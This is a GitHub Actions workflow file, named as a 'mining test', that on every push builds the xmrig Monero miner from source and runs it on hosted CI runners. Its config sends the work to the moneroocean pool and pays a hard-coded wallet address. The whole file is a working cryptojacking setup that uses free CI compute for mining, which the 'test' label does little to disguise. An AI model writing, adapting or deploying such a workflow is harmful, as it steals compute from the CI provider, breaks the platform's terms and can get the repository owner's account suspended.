name: XMR Mining Test

on: [push]

jobs:
  build-and-run:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout repo
      uses: actions/checkout@v3

    - name: Install dependencies
      run: |
        sudo apt update
        sudo apt install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev

    - name: Clone xmrig
      run: git clone https://github.com/xmrig/xmrig.git

    - name: Build xmrig
      run: |
        cd xmrig
        mkdir build
        cd build
        cmake .. -DWITH_HWLOC=OFF
        make -j$(nproc)

    - name: Create config.json
      run: |
        echo '{
          "autosave": true,
          "cpu": { "enabled": true },
          "pools": [{
            "url": "gulf.moneroocean.stream:10128",
            "user": "48FHKyg9XsQ4cFeHZCY3TbLEEo7s42ZULUG1hivPxRHAi6s8FuFFxxJ89wamDqnSNwcmHSPs22M1TfeBzBex6D5V11b1tnx",
            "pass": "mustu",
            "algo": "randomx",
            "tls": false
          }]
        }' > config.json

    - name: Run xmrig
      run: ./xmrig/build/xmrig -c config.json
